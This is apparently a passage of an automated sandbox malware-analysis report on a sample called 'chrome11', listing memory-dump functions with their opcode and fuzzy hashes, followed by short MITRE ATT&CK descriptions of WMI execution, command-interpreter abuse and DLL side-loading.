Instruction Fuzzy Hash: 47816A70D5895ADFEBA8DA1898557BD77F1FF54380F5441AAC00EA7296CE3879C2CB00

Function 00007FF887DF8D6D Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82acf53ff822a02fbc71c950bba52b390f614b4662501816c6be1860c96d5ce6
Instruction ID: c44c885bb217bb2d718a58ad57c8dcd4f25a6ba195d5fb983165f4c1a615b940
Opcode Fuzzy Hash: 82acf53ff822a02fbc71c950bba52b390f614b4662501816c6be1860c96d5ce6
Instruction Fuzzy Hash: 25814C70A1864E9FCF88DF18C8919EE77B1FF58340F14466AE81AD7286CB34E851CB81

Function 00007FF887E08078 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1190694352a4c70d4fbf0c8931a1b03290a3fa6198f08d8ee0fbf964c45b1bc9
Instruction ID: 533a70bffd2e08b74fa46b60fe5e732019c63e462895abe2a6b99a6ce93dd56f
Opcode Fuzzy Hash: 1190694352a4c70d4fbf0c8931a1b03290a3fa6198f08d8ee0fbf964c45b1bc9
Instruction Fuzzy Hash: 7561993188D78D8FDB56EF2488552ED7BB0FF06340F0505BBE54883192DB79AA58CB82

Function 00007FF887E011A0 Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b07757ef60c937f1de1fa344847bad004c33430a21a291c84431fc80cb53e36f
Instruction ID: b990b91afc7af3568a4cd560e0a0abb75cc23e07316b2ee8170d62e0c756a398
Opcode Fuzzy Hash: b07757ef60c937f1de1fa344847bad004c33430a21a291c84431fc80cb53e36f
Instruction Fuzzy Hash: 1A618930948A5D8FDB95EF68D8156EDBBF0FF59310F0401BAE408E7291CB39A948CB91

Function 00007FF887E03B30 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17d592dab148c4dd8ffc036dd35b68db96cb3c96ba8fd5dbc34ab257e0bcb26b
Instruction ID: aee37fdc5fb5cd370baeb2badc9e9479a87141afbd04ebd3d5509883cf4e1030
Opcode Fuzzy Hash: 17d592dab148c4dd8ffc036dd35b68db96cb3c96ba8fd5dbc34ab257e0bcb26b
Instruction Fuzzy Hash: 5451F23084DA8E8FEB42EB6888056FE7BB0FF4A354F1401BAD40CD7192CA3C5989C791

Function 00007FF887E07C77 Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d6cbbe13617b6e7e1f5be1698b624bac9960a10dbf7e1e8696f9f48edc19ff1
Instruction ID: 29ec79af9f06433b52e0b4045a4ef1c025e1370600af9e98d2bf2d445cf585de
Opcode Fuzzy Hash: 9d6cbbe13617b6e7e1f5be1698b624bac9960a10dbf7e1e8696f9f48edc19ff1
Instruction Fuzzy Hash: 2C512571D4861A8FDBA8DE64C8907FDB7B1FF65781F540179D009AB282CB39A886CB40

Function 00007FF887E04C90 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4f7e2157060c7747c1b1bd177fbdd0631754a5507af76e9f0b17f477f045d77
Instruction ID: d53c86e9408146b658d68876948b36c370f52f055eb70ba5a5a98deb84dccf3f
Opcode Fuzzy Hash: f4f7e2157060c7747c1b1bd177fbdd0631754a5507af76e9f0b17f477f045d77
Instruction Fuzzy Hash: 6A5129A2E4DA866FE395893C595D13D7FF1FF57A8070802BAC0448799FC929AD05C391

Function 00007FF887E079C9 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51128a98d23b833b27103189174b4fcaedeb83e5ea0bed4346e06b3a303b66e2
Instruction ID: c6d5fd84381c86ade2b35a0ca3f3e587f7266b1eed60a7ed8c36e47438fb5a0e
Opcode Fuzzy Hash: 51128a98d23b833b27103189174b4fcaedeb83e5ea0bed4346e06b3a303b66e2
Instruction Fuzzy Hash: 95419C3188D2C94FD7539B248C625E93FB0FF16250F0A01EBE458CB093D66DAA5AC762

Function 00007FF887E06F9E Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3f5d2eaad336a6f79b393c7502844359242f1c40bdce5dddd3a1138fca49253
Instruction ID: bd15d016783fe1651a72afbbcd95a0dd5ba547011291d9bf47c30a30ff5e7444
Opcode Fuzzy Hash: b3f5d2eaad336a6f79b393c7502844359242f1c40bdce5dddd3a1138fca49253
Instruction Fuzzy Hash: 15416070A0894C8FDF48EF68D454AADBBF1FF9A301F55557AD00AEB292CB359845CB00

Function 00007FF887E061DC Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f7b7ea072dcbe0919025d4363ea9cd312c4064c47d37f586a6d6bd77b32c548
Instruction ID: 57349b6f114b579638c2f19c49f06c2e11afab73dbe779af9925c5ee4b2e7a06
Opcode Fuzzy Hash: 8f7b7ea072dcbe0919025d4363ea9cd312c4064c47d37f586a6d6bd77b32c548
Instruction Fuzzy Hash: 85414A3194564E8FCB90EF28C8046EAB7F5FF863A4F00027AD41DDB1A0DB3A5A56CB41

Function 00007FF887E08168 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9c826874a800019695bf461b8139913833fec3a80589d11eaca41c5610eff63
Instruction ID: 37454680ba8de9d577440c91d2c34cc6267939a3eb2ce7dc3c5a144e32a4db64
Opcode Fuzzy Hash: b9c826874a800019695bf461b8139913833fec3a80589d11eaca41c5610eff63
Instruction Fuzzy Hash: 7441793184D68D8FDB56EF6488552ED7BB0FF1A350F0401BBE548D3192DB789A58CB82

Function 00007FF887E0547D Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b49b7526e761180b7038ea69b70803f38e3ceed2289b9c1c7442df7206d7a792
Instruction ID: 771bbbe3710479b943dac96ae78af1f360cfe7131de9f035127f82104a78a68f
Opcode Fuzzy Hash: b49b7526e761180b7038ea69b70803f38e3ceed2289b9c1c7442df7206d7a792
Instruction Fuzzy Hash: 5231E52198E7CA5FE34793345865AE93FB1BF83250F5941FAD489CB0A3D91C580AC312

Function 00007FF887E03B98 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72ed34eb55e4f1c60d07b85301ab71cdd0e67e649e6a78d7d90a44d31d2b4d74
Instruction ID: 5e2a2c7ecfc8896e8dfd82a30054d742455e3dddf372e83568f73bab2d989954
Opcode Fuzzy Hash: 72ed34eb55e4f1c60d07b85301ab71cdd0e67e649e6a78d7d90a44d31d2b4d74
Instruction Fuzzy Hash: 34318D3094DA8E8FEB81DB68C8047EE7BB1FF59350F1441BAD408D7292DA385988CB91

Function 00007FF887E02148 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a85cbb6c73b12141b494cda6ee9766aee3978502b7eae9804548b1ba93464e81
Instruction ID: 8ccd5849c7c000ed8db7f0e63eac52ffe243ee73c1030f0c428c6caa98afc3a0
Opcode Fuzzy Hash: a85cbb6c73b12141b494cda6ee9766aee3978502b7eae9804548b1ba93464e81
Instruction Fuzzy Hash: D931AB53C4E5D22AE702A7B864951FD6FF0BF127A4B2C41B6D0D88F097DD0C6586C386

Function 00007FF887E0195D Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 179f050c8ab1a5666e91c1a587617f4d61b8ba0cf1226a5d6e8968025713ba30
Instruction ID: d4a7d51c1ffbb370b2541a89fcb5892d0da09c723428a56d73ca5bc36a98aced
Opcode Fuzzy Hash: 179f050c8ab1a5666e91c1a587617f4d61b8ba0cf1226a5d6e8968025713ba30
Instruction Fuzzy Hash: DA315E70A08A4D8FDB45EFA8D4556EDBBF1FF59710F40017AE409E3292CB78A851CB91

Function 00007FF887DF66B9 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cad008c613c751ab64ed4934d33ced59756e8d33614ca5e68cf34ee757515f4
Instruction ID: a0d33fd65850e6dfd906ae44b0f515d48f7abac0dcfc6de7441bed288629ef97
Opcode Fuzzy Hash: 8cad008c613c751ab64ed4934d33ced59756e8d33614ca5e68cf34ee757515f4
Instruction Fuzzy Hash: FD31AB7081828ADFDB05DF64C8456EDBBF0FF05344F0541BAE859C7292DB38AA54CB81

Function 00007FF887E03F75 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcbd89d97ec35f5d04f2d2462bf47ddff0e9dcad937b5db58bb635323ac885c7
Instruction ID: 8dd7ed60d45e3577f3f8074ac1e408b6b2810e4771fe305495c90274e3a2336d
Opcode Fuzzy Hash: bcbd89d97ec35f5d04f2d2462bf47ddff0e9dcad937b5db58bb635323ac885c7
Instruction Fuzzy Hash: 5D113D70D4895E9FDBA9DB18C885BA877F1FB6A740F0440EAC00DE7695DA745EC4CB00

Function 00007FF887DF6EF4 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7863f0de284f74d1d7a7a3297945c332dd6cbc8483f87a38715ad7a08f73987c
Instruction ID: 35b7efc556ab8c5c82697b5dc2134e9ebbd6ee8fddd28c89a6dc63ffe664d4b7
Opcode Fuzzy Hash: 7863f0de284f74d1d7a7a3297945c332dd6cbc8483f87a38715ad7a08f73987c
Instruction Fuzzy Hash: D11118B1D4495D8FDF88EF98C485AEDB7B1FF59340F400129D00AE7659DB356841CB40

Function 00007FF887E03CBC Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b67b0dc7086bd448c0283068cadf7b15fd1480c49ee236104b48d0b71f1be7fa
Instruction ID: e64c6c3ddb233bfbbc724759dec73ef9c4b5aaad6fbc0d56cfabe3263d6c30c9
Opcode Fuzzy Hash: b67b0dc7086bd448c0283068cadf7b15fd1480c49ee236104b48d0b71f1be7fa
Instruction Fuzzy Hash: 55113C70D09A89CFEB85EF6C9454AAD7BB2FF6A780B54056AC40DCB245CA349882CB40

Function 00007FF887E0310F Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f62a71588da34b29938b14fe22da3222f840c6a9357b25dca7d3413efa74c90c
Instruction ID: ddaa2bd311310677174431fc992b0ded25c9f5b01e61930583a7f330e6417885
Opcode Fuzzy Hash: f62a71588da34b29938b14fe22da3222f840c6a9357b25dca7d3413efa74c90c
Instruction Fuzzy Hash: 4A012971D8891EDAEFA4DA599441BFDB3B0FB69780F1011BAC00DD3682DE385985CB40

Function 00007FF887DFDBA8 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4b35f2c433bce9ac3a6b81ee8fd96b5a26c2eb65ad63bd0b46f62dc30d04fca
Instruction ID: ec88a75f119d2471801366b3c8b652052e213270fb5b5ad65e61746817cb1c08
Opcode Fuzzy Hash: e4b35f2c433bce9ac3a6b81ee8fd96b5a26c2eb65ad63bd0b46f62dc30d04fca
Instruction Fuzzy Hash: 95015270918A4E9FEF84EF18C858AAD77F0FF18341F000665D829C7195DB34E951C781

Function 00007FF887DF35E1 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 998aa47bf153be83e78c3469d6656ee72971eff653aecc5e18dc157bee2e3fb3
Instruction ID: a49f3674554cf902b0bc49bad45aa85192347c02f6d8bbbfa354a348a2475ea0
Opcode Fuzzy Hash: 998aa47bf153be83e78c3469d6656ee72971eff653aecc5e18dc157bee2e3fb3
Instruction Fuzzy Hash: 1C014F7185868C8FDB84EF68C85A6DD7FF0FF58341F0506A6E818C3155DA389154CB41

Function 00007FF887E03D83 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e67c1ddc25ce5a259202f2f83fd235ecbbdff305493a413c1227be9c7dcc2ca
Instruction ID: ad78a064004d0c952f7adf46856f262c474e43a62d95aaaa8a728adb3bf281a4
Opcode Fuzzy Hash: 8e67c1ddc25ce5a259202f2f83fd235ecbbdff305493a413c1227be9c7dcc2ca
Instruction Fuzzy Hash: BAF09774D28A2C9FDF94EB98D885AEDB7F1FB68741F10006AE00DE3251CB34A981CB41

Function 00007FF887E02D08 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 024fec4b5a41438a60dc42d91122b9723afc2630a6abea677132e5d0b59abc11
Instruction ID: e866f59fd6be4d89f3c3e3e27faa48683f08d4f0ceba9f6534818e86ddd2af55
Opcode Fuzzy Hash: 024fec4b5a41438a60dc42d91122b9723afc2630a6abea677132e5d0b59abc11
Instruction Fuzzy Hash: A0F0DA308097198EDBA9DB24C45A79DB2B2FF05341F5045FDD50DA6291CF3959C0CF00

Function 00007FF887E05D6E Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a21e51dfa3b84159a5099ffb5ee52e8ac5d595bcb72711557f913abc05dd4fe
Instruction ID: 053468ccd738ad38e01fe88f1fa0cae4e0df12e0f933892d5c47e7be0f0277c6
Opcode Fuzzy Hash: 6a21e51dfa3b84159a5099ffb5ee52e8ac5d595bcb72711557f913abc05dd4fe
Instruction Fuzzy Hash: 7BD0222B4881830EC3425AF0B4810D8BBB0DE872753040073C288CF083DA6E018F8381

Function 00007FF887E03D39 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43b650b5ab8cd34facaa2c034724a13130320b0d3f220b6843db0fcdd45512f2
Instruction ID: d1e36709cb3446ac5acb0f3e5cdff9d59aa7a5cc5da23d38ef4009aafd7d1af5
Opcode Fuzzy Hash: 43b650b5ab8cd34facaa2c034724a13130320b0d3f220b6843db0fcdd45512f2
Instruction Fuzzy Hash: CBE08C30D05A4ADFF396EF2C80455A87BB2FF56381B2001AAC40CCB6A6CE344886CB40

Function 00007FF887DF28C0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a6c1607cdb46ae075c1c78a14152a655c57525984c2bfebce805f1bd4985cba
Instruction ID: 8e0b2d32975c8755717a832f8427b4114c1a7443100b713238afe9d0d9bcf516
Opcode Fuzzy Hash: 6a6c1607cdb46ae075c1c78a14152a655c57525984c2bfebce805f1bd4985cba
Instruction Fuzzy Hash: 20D01730864A4E9FDB14AF64D9016EEB265FF04344F44067AE82DC2085DA38A6A8CB82

Non-executed Functions

Function 00007FF887DF91DD Relevance: .9, Instructions: 857COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e76e612a07234e0caed72ce633671519a52a25c6f70854cf690962059660443
Instruction ID: fe6dfb87b5ba4ef12fafadcb45e4208ec83b421aeba0a8458f5995535608f793
Opcode Fuzzy Hash: 1e76e612a07234e0caed72ce633671519a52a25c6f70854cf690962059660443
Instruction Fuzzy Hash: D9726E70D0864E8FDB49DF98C4A19BEB7B2FF98300F1441AED41AA7395CA356942CF51

Function 00007FF887C114C8 Relevance: .7, Instructions: 698COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1480741877.00007FF887C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887c00000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e457da2daa692208e920f00d0f978166b6cedc91ec9c48cfe2898f917d11c8e
Instruction ID: a01c85da23748289690eafef16554399a1b29944160cf3213d55aea0357d1828
Opcode Fuzzy Hash: 9e457da2daa692208e920f00d0f978166b6cedc91ec9c48cfe2898f917d11c8e
Instruction Fuzzy Hash: 22326330A246098BDF1CDF98C8969BDB7B3FF94704F50426DD42A67295DE35B482CB82

Function 00007FF887C114C0 Relevance: .6, Instructions: 602COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1480741877.00007FF887C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887c00000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 643ecd514bb7aec549b0397d97c835721ec90ea027ad89253c9fd79dcec12189
Instruction ID: de9d8ed8ef120e848301720770c4e6203dba85c63d8dc663a088c10a71f14049
Opcode Fuzzy Hash: 643ecd514bb7aec549b0397d97c835721ec90ea027ad89253c9fd79dcec12189
Instruction Fuzzy Hash: D7225130A246098BCF1CDF98C8969BDB7B3FF98704F50426DD46A67295DE31B442CB82

Function 00007FF887C03F86 Relevance: .5, Instructions: 473COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1480741877.00007FF887C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887c00000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cc4ab13f52b8c2701c58fe4dff26568f1ebd2b9509ec8cdd797116dcb45ab60
Instruction ID: ca20a14dd7b0a88815bb014699f55f94987dde2f61d105f145fefcd94d277e7c
Opcode Fuzzy Hash: 1cc4ab13f52b8c2701c58fe4dff26568f1ebd2b9509ec8cdd797116dcb45ab60
Instruction Fuzzy Hash: EDF19430908A4D8FEBA8DF28C8557ED77E2FF55350F04426AE84DC7295DB38A945CB82

Function 00007FF887C10413 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1480741877.00007FF887C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887c00000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 316a02b9ec194db952a4851e60f784c88ce8d7e959e1a37af5fea702b8b3505d
Instruction ID: 6261674f4bffd3907e883d894ac860148f3bf148cc332f244457faac0567365c
Opcode Fuzzy Hash: 316a02b9ec194db952a4851e60f784c88ce8d7e959e1a37af5fea702b8b3505d
Instruction Fuzzy Hash: 2FF0AE30E5C92D8EDF90EB88E880BFDB7B5FF5A340F5021B1D01DE7146DA28A8818B54

Function 00007FF887DF28ED Relevance: 15.4, Strings: 12, Instructions: 399COMMON

Download Yara Rule

Strings

"9H, xrefs: 00007FF887DF2B16
b4H, xrefs: 00007FF887DF297B
"9H, xrefs: 00007FF887DF2D0E
"9H, xrefs: 00007FF887DF2C12
r6H, xrefs: 00007FF887DF2A6E
"9H, xrefs: 00007FF887DF2B6A
"9H, xrefs: 00007FF887DF2CBA
"9H, xrefs: 00007FF887DF2C66
r6H, xrefs: 00007FF887DF29C6
"9H, xrefs: 00007FF887DF2AC2
"9H, xrefs: 00007FF887DF2BBE
r6H, xrefs: 00007FF887DF2A1A

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID: "9H$"9H$"9H$"9H$"9H$"9H$"9H$"9H$b4H$r6H$r6H$r6H
API String ID: 0-1712693003
Opcode ID: 1fc1a8d747e10d5673c4c77be0229412c56e93006d4f58becc3761a43afdeeec
Instruction ID: 8778fe0f3d060fd5ffdcb3a658e809894c8d31c62c30575d17c845b7f2df49b4
Opcode Fuzzy Hash: 1fc1a8d747e10d5673c4c77be0229412c56e93006d4f58becc3761a43afdeeec
Instruction Fuzzy Hash: 27E1AE70E08A4A9FEB95EB6898513ACBBB1FF55340F5401FAC44DD7197DE282886CB02

Function 00007FF887E0557C Relevance: 5.4, Strings: 4, Instructions: 418COMMON

Download Yara Rule

Strings

tR, xrefs: 00007FF887E055CE
}J, xrefs: 00007FF887E055BA
P~J, xrefs: 00007FF887E05707
0pR, xrefs: 00007FF887E056B2

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID: }J$0pR$P~J$tR
API String ID: 0-2036870270
Opcode ID: 7f3853bdcb60cb0874f2e0762f8bd0af1ec591bfe3b1efdf3c1fd2035868c974
Instruction ID: d4b2bd427969667d90ad9e641197510d54b72123b77557736eda20ae5f1306d5
Opcode Fuzzy Hash: 7f3853bdcb60cb0874f2e0762f8bd0af1ec591bfe3b1efdf3c1fd2035868c974
Instruction Fuzzy Hash: 31C1E221A4CA8E4FE795DB2C9459A7877F2FF99790B4801BAD00DCB1A7ED2C9C45C341

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
